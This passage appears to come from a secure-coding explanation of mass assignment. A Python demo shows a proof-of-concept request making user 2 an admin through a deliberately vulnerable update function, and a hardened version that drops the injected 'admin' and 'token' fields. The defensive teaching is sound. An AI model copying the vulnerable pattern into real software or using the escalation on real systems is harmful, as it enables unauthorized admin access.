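    update_user_vulnerable(vulnerable, 2, 2, POC_BODY)
    print("vulnerable: user 2 admin ->", is_admin(vulnerable, 2))      # True

    hardened = fresh_users()
    _, dropped = update_user_hardened(hardened, 2, 2, POC_BODY)
    print("hardened:   user 2 admin ->", is_admin(hardened, 2), "dropped", dropped)  # False ['admin', 'token']
```

Two details matter beyond the allowlist: the session token arrives in the request body in the PoC and must never be taken from there or written into the record (it is in the dropped list above), and the type check on `admin` closes the loophole where a string such as `"true"` or `"false"` is stored as-is and later evaluated as truthy.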